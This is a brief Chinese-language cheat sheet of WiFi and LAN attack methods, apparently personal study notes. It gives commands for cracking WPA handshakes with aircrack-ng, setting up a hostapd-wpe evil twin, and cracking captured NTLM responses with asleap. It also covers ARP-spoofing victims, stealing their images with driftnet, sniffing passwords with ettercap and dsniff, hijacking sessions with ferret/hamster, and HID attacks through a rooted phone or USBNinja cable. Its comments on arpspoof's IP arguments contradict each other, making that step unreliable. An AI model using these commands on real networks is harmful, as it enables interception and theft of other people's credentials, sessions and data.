WIFI攻击思路
WIFI的三种加密方式
wep规则
wpa(具有密钥类)
wpa2
三种验证方式
①无验证
②单密码验证-->常见验证密码类
破解思路:
aircrack-ng抓WiFi握手包,然后通过遍历字典的方式,爆破wifi连接密码。
③连接账号密码验证
破解思路-->劫持思路
①
使用hostapd-wpe工具伪造一个同名的WiFi,然后劫持正常用户跟真WiFi之间的流量。
②配置账户
sudo vim /etc/hostapd-wpe/hostapd-wpe.conf
③怼抓取到的ntlm密码利用asleep进行破解
asleap -C <challenge> -R <response> -W 字典
wifi攻击破解的思路常用两种
第一种
wifite自动化WEP/WPA破解工具
提示没有网卡就很难受
第二种
aircrack-ng破解
监听网卡的账户密码
dsniff -i wlan0
echo 1 >/proc/sys/net/ipv4/ip_forward
#即开启端口转发功能
arpspoof -i eth0 -t 192.168.1.1 192.168.1.104
#即 前面的IP是靶机的IP,后面的IP是攻击者的ip 即将该ip欺骗到其他上面的状况特点-->断网攻击
#arpspoof -i 网卡 -t 网关 目标IP
driftnet -i eth0
#窃取受害者的图片
ettercap -Tq -i eth0
#ettercap -i 网卡 -Tq -M
#进行账号密码嗅探-->即抓取账号密码状况特点
tcpdump -i eth0 -w qq.cap
ferret -t qq.cap (64位下需要安装)
hamster
http://hamster
#session劫持
特殊手段攻击
HID攻击(即将手机连接电脑进行攻击)
手机需求
①root内核
②打入USB HID补丁
https://github.com/pelya/android-keyboard-gadget
典型平台
Kali Linux Nethunter
USBNinja
Pro版的USBNinja数据线直接进行攻击